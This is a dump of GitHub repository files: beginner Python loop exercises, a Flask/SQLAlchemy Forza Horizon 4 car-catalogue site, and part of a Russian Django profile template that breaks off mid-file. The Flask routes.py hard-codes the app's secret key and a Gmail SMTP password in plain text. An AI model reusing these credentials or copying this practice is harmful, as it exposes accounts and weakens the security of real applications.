[ { "alpha_fraction": 0.31586122512817383, "alphanum_fraction": 0.3490380346775055, "avg_line_length": 13.767337799072266, "blob_id": "a66212ce6a9189f5b2ae3e173c03e7d02b25cc8d", "content_id": "16f72f6f50c865ca95a97158c265a03cfabaa406", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6601, "license_type": "permissive", "max_line_length": 119, "num_lines": 447, "path": "/loop.py", "repo_name": "priyanshumishra1009/loop_basic_question.py", "src_encoding": "UTF-8", "text": "### sum print ###\n\n# a=50\n# b=0\n# while a<60:\n# c=int(input(\"enter the number:\"))\n# b=b+c\n# a+=1\n# print(b)\n\n\n# a=50\n# b=0\n# while a-60:\n# c=int(input(\"enter the number:\"))\n# b=b+c\n# a+=1\n# print(b)\n\n\n# a=int(input(\"enter the number: \"))\n# b=0\n# x=0\n# while b<a:\n# c=int(input())\n# b+=1\n# x+=c\n# print(x)\n\n\n#######################################\n#### sum and average of the element #####\n\n# a=3\n# b=1\n# c=0\n# e=0\n# while b<=a:\n# p=int(input())\n# c+=p\n# e=c/a\n# b+=1\n# print(c)\n# print(e)\n\n#######################\n# ### prime number ####\n\n# a=int(input())\n# f=0\n# b=2\n# while b<=a/2:\n# if a%b==0:\n# f=1\n# break\n# b=b+1\n# if f==0:\n# print(\"prime\")\n# else:\n# print(\" not prime number\")\n\n\n# a=int(input(\" \"))\n# b=2\n# while b<a:\n# if a%b==0:\n# print(\"no\")\n# break\n# b+=1\n# else:\n# print(\"yes\")\n\n\n# a=20\n# while a<=100:\n# print(a)\n# a+=2\n\n\n# a=7\n# while a<100:\n# print(a)\n# a+=7\n\n\n# a=30\n# b=0\n# while a<=40:\n# b=a+b\n# a=a+2\n# print(b)\n\n\n# a=12\n# b=0\n# while a<=420:\n# b=a+b\n# a+=1\n# print(b)\n\n\n# a=30\n# b=0\n# while a<420:\n# if a%8==0:\n# b=a+b\n# print(\"a\",a)\n# a+=1\n# print(b)\n\n#######################\n#### average print ####\n\n# a=1\n# b=0\n# while a<=11:\n# c=int(input())\n# b=b+c\n# d=b/11\n# a+=1\n# if d%5==0:\n# print(\"yes\")\n# else:\n# print(\"no\")\n# print(d)\n\n#################################################\n#### odd number pisitive even number negative ####\n\n# a=1\n# b=2\n# while a<=100:\n# print(a)\n# print(b*(-1))\n# a+=2\n# b+=2\n\n######################\n#### gussing game ####\n\n# a=5\n# b=1\n# c=0\n# while b<=3:\n# c=int(input(\"enter the number: \"))\n# b+=1\n# if a==c:\n# print(\"won\")\n# break\n# else:\n# print(\"try again\")\n# else:\n# print(\"you lost the game \")\n \n\n# a=5\n# b=1\n# c=0\n# while b<=3:\n# c=int(input(\"enter the number: \"))\n# b+=1\n# if a==c:\n# print(\"won\")\n# break\n# elif a>c:\n# print(\"chota hai try again\")\n# else:\n# print(\"bada hai try again\")\n# else:\n# print(\"you lost the game \")\n\n\n# a=1\n# b=0\n# while a<=50:\n# a,b=b,a\n# c=a+b\n# print(c)\n# a+=1 \n\n\n# c=0\n# d=1\n# while c<3:\n# c=c+1\n# d=d*c\n# print(c,d)\n# else:\n# # print(c,d)\n\n\n# i = 0\n# while(i<5):\n# j = 0\n# while(j<5): #loop2\n# if (j > 3): \n# break \n# else:\n# print (\"*\") \n# j = j + 1 \n# print ('')\n# i = i + 1\n \n\n# x = 0\n# while(x<7):\n# if (x == 3 or x==5):\n# x = x + 1\n# continue\n# print(x)\n# x = x + 1 \n\n\n#####################################################\n#### 2 number multiply without use multiply sign ####\n\n# a=int(input(\"enter the number: \"))\n# b=int(input(\"enter the number: \"))\n# c=0\n# co=0\n# while c<b:\n# co=co+a\n# c+=1\n# print(co)\n\n\n################################\n##### Fibonacci Series #####\n\n# a=int(input())\n# b=0\n# c=1\n# d=0\n# while d<=a:\n# # print(b)\n# e=b+c\n# b=c\n# c=e\n# d+=1\n# print(b)\n\n\n###################################################\n##### 
star pattern difference difference type #####\n\n# a=int(input())\n# b=0\n# while b<+a:\n# print(\" \"*(a-2)+\" *\"*(a-b))\n# b+=1\n\n# a=int(input())\n# b=0\n# while b<+a:\n# print(\" \"*(a+b)+\" *\"*(a-b))\n# b+=1\n\n# a=int(input())\n# b=0\n# while b<+a:\n# print(\" \"*(a-b)+\"* \"*(a-b))\n# b+=1\n\n# a=int(input( ))\n# b=1\n# while b<=a:\n# print(\" \"*(a-b)+\"* \"*b)\n# b+=1\n \n# a=int(input())\n# b=1\n# while b<+a:\n# print(\" \"*(a-b)+\" *\"*a)\n# b+=1\n\n# a=int(input())\n# b=0\n# while b<+a:\n# print(\" \"*(a-b)+\" *\"*(a-b))\n# b+=1\n\n# a=int(input( ))\n# b=1\n# while b<=a:\n# print(\" \"*(a-b)+\"* \"*b)\n# b+=2\n\n\n##########################################################\n### odd number is positive and even number is negative ###\n\n# a=1\n# b=2\n# while a<=100:\n# print(a,b*(-1))\n# a+=2\n# b+=2\n\n\n################################\n### this code is hppy number ###\n\n# num=int(input())\n# n=num\n# sum=0\n# while sum!= 1 and sum!=4:\n# sum=0\n# while n>0:\n# digit=n%10\n# sum=sum+digit**2\n# n=n//10\n# n=sum\n# if sum==1:\n# print(\"h\")\n# else:\n# print(\"n\")\n\n\n#####################\n##### Factiriol #####\n\n# a=int(input())\n# b=1\n# for i in range (a):\n# b=b*(i+1)\n# print(b)\n\n\n#########################################\n#### This code is String palindrome ####\n\n# x=input(\" \")\n# b=\"\"\n# for i in x:\n# b=i+b\n# if x==b:\n# print(\"y\")\n# else:\n# print(\"n\")\n\n\n########################## \n#### R pattern print ####\n\n# x=4\n# y=1\n# while y!=5:\n# if y==1:\n# print(\"* \"*x)\n# print(\"* \",\" \"*2,\"*\")\n# print(\"* \"*x)\n# else:\n# print(\"*\",\" \"*(y-2),\"*\")\n# y+=1\n \n\n#########################\n### table print 2*1=2 ###\n\n# a=int(input())\n# for i in range (1,11):\n# print(str(a), \"*\", str(i), \"=\", str(i*a))\n\n# a= int(input())\n# for i in range (1, a+1):\n# for j in range (1,11):\n# print(i*j)\n# print()\n\n\n#########################################\n###### odd and even number ##########\n# a=1\n# while a<=100:\n# a+=1\n# if a%2==0:\n# print(a,\"even\")\n# if a==100:\n# a-=99\n# else:\n# print(a,\"odd\")\n# a+=1\n\n\n##############################################\n#### odd even print (first even then odd) ####\n\n# a=2\n# while a<=200:\n# if a<=100:\n# if a%2==0:\n# print(a)\n# else:\n# if a%2!=0:\n# print(a-100)\n# a+=1 \n\n\n########################################################################\n#### first pehle ke three number even then baad ke three number odd ####\n\n# a=int(input())\n# f=a\n# v=f\n# i=0\n# while a>0:\n# a-=1\n# if a%2==0:\n# print(a,end=' ')\n# if f-a==5:\n# break\n# elif f-a==6:\n# break\n# print()\n# while f>0:\n# f+=1\n# if f%2!=0:\n# print(f,end=' ')\n# if f-v==5:\n# break\n# elif f-v==6:\n# break\n# print()\n\n\n########################################\n### without use number print 1 to 10 ###\n\n# a=ord(\"A\")\n# b=ord(\"J\")\n# c=ord(\"@\")\n# x = a-c\n# while a <= b:\n# print(a-c)\n# a+=x\n\n\n##################################\n####### integer palindrome #######\n\n# x=int(input())\n# s = str(x)\n# rs = \"\".join(list(reversed(s)))\n# if rs != s:\n# print (False)\n# else:\n# print(True)\n" }, { "alpha_fraction": 0.8061224222183228, "alphanum_fraction": 0.8061224222183228, "avg_line_length": 48, "blob_id": "644e50467911e841e9bebb25c05a34263aef9edf", "content_id": "1677ddfe99548e3155d25e5f695bb49a9f785edf", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 98, "license_type": "permissive", "max_line_length": 72, "num_lines": 2, "path": 
"/README.md", "repo_name": "priyanshumishra1009/loop_basic_question.py", "src_encoding": "UTF-8", "text": "# loop_basic_question.py\nThese are some basic question of loops which i did while learning python\n" } ]
2
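The happy-number exercise in the commented-out practice file above is the least obvious of the lot. For reference, here is a minimal runnable sketch of the same idea; the `is_happy` helper and the sample inputs are editorial additions rather than code from the repository, and the loop relies on the standard fact that every unhappy number's digit-square sequence eventually reaches 4.

```python
def is_happy(num: int) -> bool:
    """Return True if repeatedly summing squared digits of num reaches 1."""
    # Every unhappy number eventually enters the cycle containing 4,
    # so 4 works as a second stopping sentinel alongside 1.
    while num not in (1, 4):
        num = sum(int(digit) ** 2 for digit in str(num))
    return num == 1


print(is_happy(19))  # True: 19 -> 82 -> 68 -> 100 -> 1
print(is_happy(20))  # False: 20 -> 4, the entry to the unhappy cycle
```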
Reih02/FH4_Cars
https://github.com/Reih02/FH4_Cars
51a29447962cde8b9a58a0d26137e9e44b4f423e
f03536208796d616cbdba4197390ce15f70e2ee6
0e1b350ea3fa1daa8899e512ed07427e04f66564
refs/heads/master
2022-12-28T00:04:30.028648
2020-09-10T22:16:17
2020-09-10T22:16:17
248,074,158
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6019737124443054, "alphanum_fraction": 0.6069079041481018, "avg_line_length": 23.31999969482422, "blob_id": "ba3a39846754180cd0e765f30193b1269aa7ab6d", "content_id": "27bc1d8eff7364b8f07dbe135649b0e6ac31ae8d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 608, "license_type": "no_license", "max_line_length": 84, "num_lines": 25, "path": "/templates/msearch.html", "repo_name": "Reih02/FH4_Cars", "src_encoding": "UTF-8", "text": "{%extends 'layout.html'%}\n\n{%block content%}\n<title>\n MANUFACTURER LIST\n</title>\n<div id = 'smallbox'>\n <h2>\n Manufacturers matching your search:\n </h2>\n</div>\n\n<div id = 'largebox'>\n <!-- if list 'manufacturer' in msearch route has length (i.e it exists) -->\n {% if manufacturer|length == 0 %}\n <p> No manufacturers found! </p>\n {% else %}\n {% for manufacturers in manufacturer %}\n <!--adds each image onto page by using its value in the database-->\n <p><a href=\"/manufacturer/{{ manufacturers.id }}\">{{ manufacturers.name }}</p>\n {% endfor %}\n {% endif %}\n</div>\n\n{%endblock%}\n" }, { "alpha_fraction": 0.6681606769561768, "alphanum_fraction": 0.6728057861328125, "avg_line_length": 38.97068405151367, "blob_id": "c27f7c6ecb7e6814808fe826a32779a4dcfecea0", "content_id": "066ce050f73a5d7e02437bfd7cb79df16c0151e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12271, "license_type": "no_license", "max_line_length": 115, "num_lines": 307, "path": "/routes.py", "repo_name": "Reih02/FH4_Cars", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template, flash, redirect, url_for, request, abort\nfrom flask_sqlalchemy import SQLAlchemy\nfrom werkzeug.urls import url_parse\nimport models\nfrom forms import LoginForm, RegistrationForm, SearchForm\nfrom flask_login import logout_user, login_user, LoginManager, current_user, login_required\nfrom flask_mail import Mail\nfrom forms import ResetPasswordRequestForm, ResetPasswordForm\nfrom sqlalchemy.exc import IntegrityError\n\n# initialisation stuff\napp = Flask(__name__)\n\n# defines secret key for use in anything encrypted(logins, password hashing, etc.)\napp.config['SECRET_KEY'] = 'vr2YEHkNyPsuF3TdFMsL5a67veTPBtjrfx5FrdRLky5TQf3wAL'\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///FH4_cars.db'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['MAIL_SERVER'] = 'smtp.gmail.com'\napp.config['MAIL_PORT'] = 587\napp.config['MAIL_USE_TLS'] = 1\napp.config['MAIL_USERNAME'] = '[email protected]'\napp.config['MAIL_PASSWORD'] = 'pamrxmhwpfvgsoxb'\napp.config['ADMINS'] = '[email protected]'\n\ndb = SQLAlchemy(app)\nloginTest = LoginManager(app)\nloginTest.login_view = 'login'\n\nmail = Mail(app)\n# ---------------------\n# had to put this import down here because it somehow made the import work\nfrom email1 import send_password_reset_email\n\n# defines searchform for use in search functions\[email protected]_processor\ndef inject_search():\n searchform = SearchForm()\n return dict(searchform=searchform)\n\n# home route (where users land upon visit)\[email protected]('/')\ndef home():\n return render_template(\"home.html\", page_title=\"WELCOME TO FH4 CARS\")\n\n# route to show all cars\[email protected]('/cars', methods=['GET', 'POST'])\ndef cars():\n cars = models.Car.query.all()\n # defines search form under form variable for use later\n form = SearchForm()\n # if search form validates:\n if form.validate_on_submit():\n # run next route 
(carsearch)\n return redirect(url_for('carsearch', search=form.query.data))\n else:\n if request.method == 'POST':\n flash('Please do not enter more than 30 characters in a search')\n # go back\n return render_template('list_cars.html', page_title=\"CAR LIST\",\n cars=cars)\n\n# route to show a user's searched car matches\[email protected]('/carsearch/<search>', methods=['GET', 'POST'])\ndef carsearch(search):\n # get cars whose names match the search input from the database\n # (using SQLAlchemy's ilike pattern matching)\n car = models.Car.query.filter(models.Car.name.ilike('%{}%'.format(search))).all()\n print(car)\n # prints the name of each matching car, as there are usually multiple results\n for i in car:\n print(i.name)\n return render_template('csearch.html', page_title=\"YOUR SEARCH\", car=car)\n\n\n# route to show info on the car the user selects/clicks\[email protected]('/car/<int:info>', methods=['GET', 'POST'])\ndef car(info):\n car = models.Car.query.filter_by(id=info).first_or_404()\n # gets the manufacturer that made the car\n manufacturer = models.Manufacturer.query.filter_by(id=car.manufacturerid).first()\n title = car.name\n # the following try/except works around the AttributeError raised when an\n # anonymous user (who has no id) views a car\n try:\n favourited = models.UserCar.query.filter_by(uid=current_user.id, cid=info).all()\n except AttributeError:\n favourited = None\n return render_template('show_cars.html', page_title=title, car=car,\n manufacturer=manufacturer,\n favourited=favourited)\n\n\n# route to add favourite car to user's profile\[email protected]('/favourite/<int:id>', methods=['GET', 'POST'])\n@login_required\ndef favourite(id):\n # adds a favourite car by storing the current user's id in the uid column,\n # and the car's id in the cid column\n is_favourited = models.UserCar.query.filter_by(uid=current_user.id, cid=id).first()\n if is_favourited is None:\n try:\n favourite_car = models.UserCar(uid=current_user.id, cid=id)\n db.session.add(favourite_car)\n db.session.commit()\n except:\n abort(500)\n return redirect(url_for('car', info=id))\n\n\n# route to delete a favourite car from a user's profile\[email protected]('/delete/<int:id>', methods=['GET', 'POST'])\n@login_required\ndef delete(id):\n # deletes favourite car by getting the car where uid is the current user's\n # id and the cid is the current car's id in the favourited car table,\n # and removing it from the database\n try:\n favourite_car = db.session.query(models.UserCar).filter_by(uid=current_user.id, cid=id).first_or_404()\n db.session.delete(favourite_car)\n db.session.commit()\n except:\n redirect(url_for('car', info=id))\n return redirect(url_for('car', info=id))\n\n\n# route to show all manufacturers\[email protected]('/manufacturers', methods=['GET', 'POST'])\ndef manufacturers():\n form = SearchForm()\n manufacturers = models.Manufacturer.query.all()\n if form.validate_on_submit():\n return redirect(url_for('manufacturersearch', search=form.query.data))\n else:\n if request.method == 'POST':\n flash('Please do not enter more than 30 characters in a search')\n return render_template('list_manufacturers.html',\n page_title=\"MANUFACTURER LIST\",\n manufacturers=manufacturers)\n\n\n# route to show all matches for a user's search on the manufacturer page\[email protected]('/manufacturersearch/<search>', methods=['GET', 'POST'])\ndef manufacturersearch(search):\n manufacturer = models.Manufacturer.query.filter(models.Manufacturer.name.ilike('%{}%'.format(search))).all()\n 
print(manufacturer)\n for i in manufacturer:\n print(i.name)\n return render_template('msearch.html', page_title=\"YOUR SEARCH\",\n manufacturer=manufacturer)\n\n\n# route that shows more info on the manufacturer the user opened\[email protected]('/manufacturer/<int:info>')\ndef manufacturer(info):\n manufacturer = models.Manufacturer.query.filter_by(id=info).first()\n # gets cars manufacturer made by getting all cars that have the\n # same manufacturer id as the current manufacturer's id\n cars = models.Car.query.filter_by(manufacturerid=manufacturer.id).all()\n title = manufacturer.name\n return render_template('show_manufacturers.html', page_title=title,\n manufacturer=manufacturer, cars=cars)\n\n\n# route to handle logins for the user\[email protected]('/login', methods=['GET', 'POST'])\ndef login():\n # redirect users back if they are already logged in\n if current_user.is_authenticated:\n return redirect(url_for('home'))\n form = LoginForm()\n # if the form validates:\n if form.validate_on_submit():\n # checks if username is in the database\n user = models.User.query.filter_by(username=form.username.data).first()\n # if the user doesn't exist or the password doesn't match:\n if user is None or not user.check_password(form.password.data):\n # tell user login didn't work and go back to login page\n flash('Invalid username or password')\n return redirect(url_for('login'))\n login_user(user, remember=form.remember_me.data)\n # gets contents of flask's request variable that contains all the info\n # that the user sent with their request\n next_page = request.args.get('next')\n if not next_page or url_parse(next_page).netloc != '':\n # sends users home if nothing obtained from form\n next_page = url_for('home')\n return redirect(next_page)\n return render_template('login.html', title='Sign In', form=form)\n\n\n# route to handle sign ups for the user\[email protected]('/signup', methods=['GET', 'POST'])\ndef signup():\n # sends users home if already logged in\n if current_user.is_authenticated:\n return redirect(url_for('home'))\n form = RegistrationForm()\n if form.validate_on_submit():\n # puts username, email, and password into the database\n user = models.User(username=form.username.data, email=form.email.data)\n user.set_password(form.password.data)\n db.session.add(user)\n db.session.commit()\n # tells user they are signed up and sends them to login page\n flash('Congratulations, you are now a registered user!')\n return redirect(url_for('login'))\n return render_template('signup.html', title='Sign up', form=form)\n\n\n# route to handle logging out for the user\[email protected]('/logout')\ndef logout():\n # uses flask's built-in logout feature and sends users home after\n # logging out\n logout_user()\n return redirect(url_for('home'))\n\n\n# route that shows the user's current profile (if logged in)\[email protected]('/profile/<username>')\ndef profile(username):\n # if user is not signed in:\n if current_user.is_anonymous:\n # tells the user to log in before viewing their profile, and sends them home\n flash(\"Please log in or sign up before attempting to view your profile!\")\n return redirect(url_for('home'))\n # gets the corresponding info from database for the current user\n profile = models.User.query.filter_by(username=username).first_or_404()\n favcars = models.UserCar.query.filter_by(uid=current_user.id).all()\n # puts user's favourite cars in a temporary list in order to call\n # everything that applies, and then calls from list (only working way I\n # could implement this function)\n templist = []\n for i in 
favcars:\n templist.append(i.cid)\n cars = models.Car.query.filter(models.Car.id.in_(templist)).all()\n return render_template('profile.html', title='Your Profile',\n profile=profile, cars=cars)\n\n# route to send email to user with link to reset password page\[email protected]('/reset_password_request', methods=['GET', 'POST'])\ndef reset_password_request():\n # if user is already logged in:\n if current_user.is_authenticated:\n # send user home\n return redirect(url_for('home'))\n form = ResetPasswordRequestForm()\n if form.validate_on_submit():\n # gets email to send password reset to and sends\n user = models.User.query.filter_by(email=form.email.data).first()\n if user:\n send_password_reset_email(user)\n # tells user to check email for reset password link and sends them to\n # login page\n flash('Check your email for the instructions to reset your password')\n return redirect(url_for('login'))\n return render_template('reset_password_request.html',\n title='Reset Password', form=form)\n\n\n# route to reset password (link to route obtained from email)\[email protected]('/reset_password/<token>', methods=['GET', 'POST'])\ndef reset_password(token):\n # if user is already logged in:\n if current_user.is_authenticated:\n # send them home\n return redirect(url_for('home'))\n user = models.User.verify_reset_password_token(token)\n # if the token can't be verified as belonging to a valid user:\n if not user:\n # send them home\n return redirect(url_for('home'))\n form = ResetPasswordForm()\n if form.validate_on_submit():\n # updates the stored password hash in the database\n user.set_password(form.password.data)\n db.session.query(models.User).filter_by(id=user.id).update({models.User.password_hash: user.password_hash})\n db.session.commit()\n # tells user they have reset password successfully and sends them to\n # login page\n flash('Your password has been reset.')\n return redirect(url_for('login'))\n return render_template('reset_password.html', form=form)\n\n\n# error handler for a 404 error (returns 404.html instead of standard 404 page)\[email protected](404)\ndef page_not_found(e):\n return render_template(\"404.html\")\n\n\n# error handler for a 500 error (returns 500.html instead of standard 500 page)\[email protected](500)\ndef internal_server(e):\n return render_template(\"500.html\")\n\n\n# keeps track of user by storing id when they visit a page, and then uses this\n# id to load the user into memory\[email protected]_loader\ndef load_user(id):\n return models.User.query.get(int(id))\n\n\n# tells flask what port to run on\nif __name__ == \"__main__\":\n app.run(debug=False, port=1111)\n" }, { "alpha_fraction": 0.651153028011322, "alphanum_fraction": 0.6628930568695068, "avg_line_length": 33.565216064453125, "blob_id": "5748eddd27b61e1f8a43b864fbe142bcb0daec2f", "content_id": "1f0fefce9fb529fde61da6e93157a84fddf9a4a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2385, "license_type": "no_license", "max_line_length": 86, "num_lines": 69, "path": "/models.py", "repo_name": "Reih02/FH4_Cars", "src_encoding": "UTF-8", "text": "from routes import db, app\nfrom werkzeug.security import generate_password_hash, check_password_hash\nfrom flask_login import UserMixin\nfrom time import time\nimport jwt\n\n\n# defines the columns of the Car table\nclass Car(db.Model):\n __tablename__ = 'Car'\n\n id = db.Column(db.Integer, primary_key=True, nullable=False, unique=True)\n name = db.Column(db.Text(50), nullable=False)\n horsepower = 
db.Column(db.Text, nullable=False)\n cost = db.Column(db.Text, nullable=False)\n wheeldrive = db.Column(db.Text, nullable=False)\n weight = db.Column(db.Text, nullable=False)\n image = db.Column(db.Text)\n manufacturerid = db.Column(db.Text, db.ForeignKey('Manufacturer.id'))\n\n\n# defines the columns of the Manufacturer table\nclass Manufacturer(db.Model):\n __tablename__ = 'Manufacturer'\n\n id = db.Column(db.Integer, primary_key=True, nullable=False, unique=True)\n name = db.Column(db.Text(50), nullable=False)\n details = db.Column(db.Text(250), nullable=False)\n\n\n# defines the columns of the User table\nclass User(UserMixin, db.Model):\n __tablename__ = 'User'\n id = db.Column(db.Integer, primary_key=True)\n username = db.Column(db.String(64), index=True, unique=True)\n password_hash = db.Column(db.String(128))\n email = db.Column(db.String(128))\n\n # tells Python how to print objects of this class for debugging purposes\n def __repr__(self):\n return '<User {}>'.format(self.username)\n\n def set_password(self, password):\n self.password_hash = generate_password_hash(password)\n\n def check_password(self, password):\n return check_password_hash(self.password_hash, password)\n\n # encodes a reset token as a JWT signed with HS256 (HMAC-SHA256)\n def get_reset_password_token(self, expires_in=600):\n return jwt.encode({'reset_password': self.id, 'exp': time() + expires_in},\n app.config['SECRET_KEY'], algorithm='HS256').decode('utf-8')\n\n @staticmethod\n def verify_reset_password_token(token):\n try:\n id = jwt.decode(token, app.config['SECRET_KEY'],\n algorithms=['HS256'])['reset_password']\n except:\n return\n return User.query.get(id)\n\n\n# defines the columns of the UserCar table\nclass UserCar(db.Model):\n __tablename__ = 'UserCar'\n id = db.Column(db.Integer, primary_key=True)\n uid = db.Column(db.ForeignKey('User.id'))\n cid = db.Column(db.ForeignKey('Car.id'))\n" }, { "alpha_fraction": 0.594936728477478, "alphanum_fraction": 0.594936728477478, "avg_line_length": 32.71428680419922, "blob_id": "2c3c822221d375960d8f08533c94a0e8842ddb89", "content_id": "ba3c3bef07bf6847611291f1b7d50e649df2730f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 474, "license_type": "no_license", "max_line_length": 77, "num_lines": 14, "path": "/static/js.js", "repo_name": "Reih02/FH4_Cars", "src_encoding": "UTF-8", "text": " // jQuery functionality for all forms (except delete), to stop double submits\n\n // disable submit button after first click to avoid spam clicks\n $(document).ready(function() {\n // define fields as variables\n var submit_button = $('input#submit');\n var form = $('form#signupform');\n // on submit, disable submit button\n form.submit(function() {\n if (form) {\n submit_button.prop('disabled', true);\n }\n });\n });\n" } ]
4
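Both carsearch and manufacturersearch in the routes.py above lean on the same `ilike` substring filter. The sketch below isolates that pattern in a self-contained form, assuming Flask-SQLAlchemy 3.x; the `Car` model fields, in-memory database URI, and sample rows are illustrative assumptions, not code taken from the repository.

```python
from flask import Flask
from flask_sqlalchemy import SQLAlchemy

app = Flask(__name__)
app.config["SQLALCHEMY_DATABASE_URI"] = "sqlite:///:memory:"
db = SQLAlchemy(app)


class Car(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.Text, nullable=False)


with app.app_context():
    db.create_all()
    db.session.add_all([Car(name="Audi TT RS"), Car(name="Ford GT")])
    db.session.commit()
    # wrapping the query in '%...%' makes ilike match any substring,
    # case-insensitively -- the same trick the routes above use
    matches = Car.query.filter(Car.name.ilike("%{}%".format("audi"))).all()
    print([car.name for car in matches])  # ['Audi TT RS']
```

On SQLite, which has no native ILIKE operator, SQLAlchemy emulates `ilike` by lower-casing both sides of a LIKE comparison, which is why the searches stay case-insensitive against the app's SQLite database.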
Kikono1014/Marupik_site
https://github.com/Kikono1014/Marupik_site
44384d1e6df5d4a888fe147c12a0389dcd38b532
3232516e343bc6edc0653def6e7db760506e305a
ac30f5849fde5d972f5ea31093aa7d5e0aa6acb3
refs/heads/main
2023-08-11T06:59:58.663913
2021-09-12T20:47:15
2021-09-12T20:47:15
379,552,319
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5289201736450195, "alphanum_fraction": 0.5401363372802734, "avg_line_length": 33.70228958129883, "blob_id": "b504884a985506507cce4c74db7e07fde680ee8f", "content_id": "b46517de095590b5d94b84f80731636cc0c1ff1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 4757, "license_type": "no_license", "max_line_length": 198, "num_lines": 131, "path": "/blog/templates/profile/another_profile_page.html", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "{% load static %}\n\n\n<!DOCTYPE html>\n\n<html>\n\n\t<head>\n\t\t{% include 'parts_of_page/pages_head.html' %}\n\n\t</head>\n\n\n\t<body>\n\n\n\n\t\t<div class=\"wrapper\">\n\n\t\t\t{% include 'parts_of_page/header.html' %}\n\n\t\t\t{% include 'parts_of_page/news.html' %}\n\n\t\t\t<div class=\"content\">\n\t\t\t\t<div class=\"profile_page\">\n\t\t\t\t\t<div class=\"img_div\">\n\t\t\t\t\t\t<img src=\"{{user_image}}\" width=\"100%\">\n\t\t\t\t\t</div>\n\t\t\t\t\t<div class=\"profile_div username\"><p style=\"font-size: 35px; color: {{role_color}}\">{{ username }}</p></div>\n\t\t\t\t\t<div class=\"profile_div full_info\">\n\t\t\t\t\t\t{% for info in full_info %}\n\t\t\t\t\t\t\t<p>{{ info }}</p>\n\t\t\t\t\t\t{% endfor %}\n\t\t\t\t\t</div>\n\n\t\t\t\t\t\n\n\t\t\t\t\t<div class=\"profile_div role\"><p>Роль на сайте: {{ role }} {% if admin %}+ Он ещё и админ{% endif %}</p></div>\n\n\t\t\t\t\t{% if admin or 'Представитель города' in role %}\n\t\t\t\t\t\t<form method=\"POST\" class=\"register_and_login\" style=\"margin-top: 10px\">\n\t\t\t\t\t\t\t{% csrf_token %}\n\t\t\t\t\t\t\t<div class=\"profile_div roles\">\n\t\t\t\t\t\t\t\t{% for choice in profile_form.role %}\n\t\t\t\t\t\t\t\t\t<div>\n\t\t\t\t\t\t\t\t <p>{{ choice }}</p>\n\t\t\t\t\t\t\t </div>\n\t\t\t\t\t\t\t {% endfor %}\n\t\t\t\t\t\t </div>\n\t\t\t\t\t\t\n\t\t\t\t\t\t<button type=\"submit\" class=\"button\" style=\"float: right;\">Сохранить изменения</button>\n\t\t\t\t\t\t</form>\n\t\t\t\t\t{% endif %}\n\n\n\t\t\t\t\t<div class=\"comments_block\">\n\n\t\t\t\t\t<h1 class=\"title\">Коментарии:</h1>\n\t\t\t\t\t\n\t\t\t\t\t{% if islogin %}\n\t\t\t\t\t\t<div class=\"add_comment\">\n\t\t\t\t\t\t\t<p>Написать новый коментарий:</p>\n\t\t\t\t\t\t\t<form class=\"add_something\" method=\"post\">\n\t\t\t\t\t\t\t\t{% csrf_token %}\n\t\t\t\t\t\t\t\t<p>{{ comment_form.body }}</p>\n\t\t\t\t\t\t\t\t<button type=\"submit\" class=\"button\" style=\"float: right;\">Добавить</button>\n\t\t\t\t\t\t\t</form>\n\t\t\t\t\t\t</div>\n\t\t\t\t\t{% else %}\n\t\t\t\t\t\t<p>Зарегистрируйтесь, что бы написать коментарий</p>\n\t\t\t\t\t{% endif %}\n\n\n\t\t\t\t\t<div class=\"comment_list\">\n\t\t\t\t\t\t\t{% for comment in comments %}\n\t\t\t\t\t\t\t\t<div class=\"comment\" id=\"comment\" style=\"min-height: 350px;\">\n\t\t\t\t\t\t\t\t\t<div class=\"info\">\n\t\t\t\t\t\t\t\t\t\t<a href=\"{%url 'another_profile' user_id=comment.userid%}\"><div class=\"image_div\"><img src=\"{{comment.image}}\" width=\"100%\"></div></a>\n\t\t\t\t\t\t\t\t\t\t{% if 'Представитель города' in comment.role %}\n\t\t\t\t\t\t\t\t\t\t\t<p style=\"; text-align: center; font-size: 20px;\"><a href=\"{%url 'another_profile' user_id=comment.userid%}\" class=\"username\" style=\"color: rgb(200, 0, 200)\"> {{ comment.name }} </a></p>\n\t\t\t\t\t\t\t\t\t\t{% elif 'ФБР' in comment.role or 'Глава ФБР' in comment.role %}\n\t\t\t\t\t\t\t\t\t\t\t<p style=\"; text-align: center; font-size: 20px;\"><a href=\"{%url 'another_profile' user_id=comment.userid%}\" 
class=\"username\" style=\"color: blue}\"> {{ comment.name }} </a></p>\n\t\t\t\t\t\t\t\t\t\t{% elif 'Мэр' in comment.role %}\n\t\t\t\t\t\t\t\t\t\t\t<p style=\"; text-align: center; font-size: 20px;\"><a href=\"{%url 'another_profile' user_id=comment.userid%}\" class=\"username\" style=\"color: brown\"> {{ comment.name }} </a></p>\n\t\t\t\t\t\t\t\t\t\t{% elif 'Журналист' in comment.role %}\n\t\t\t\t\t\t\t\t\t\t\t<p style=\"; text-align: center; font-size: 20px;\"><a href=\"{%url 'another_profile' user_id=comment.userid%}\" class=\"username\" style=\"color: rgb(0, 200, 100)\"> {{ comment.name }} </a></p>\n\t\t\t\t\t\t\t\t\t\t{% elif style_file == 'css/light1.css' or style_file == 'css/purple_gold.css' %}\n\t\t\t\t\t\t\t\t\t\t\t<p style=\"; text-align: center; font-size: 20px;\"><a href=\"{%url 'another_profile' user_id=comment.userid%}\" class=\"username\" style=\"color: black\"> {{ comment.name }} </a></p>\n\t\t\t\t\t\t\t\t\t\t{% else %}\n\t\t\t\t\t\t\t\t\t\t\t<p style=\"; text-align: center; font-size: 20px;\"><a href=\"{%url 'another_profile' user_id=comment.userid%}\" class=\"username\" style=\"color: white; \"> {{ comment.name }} </a></p>\n\t\t\t\t\t\t\t\t\t\t{% endif 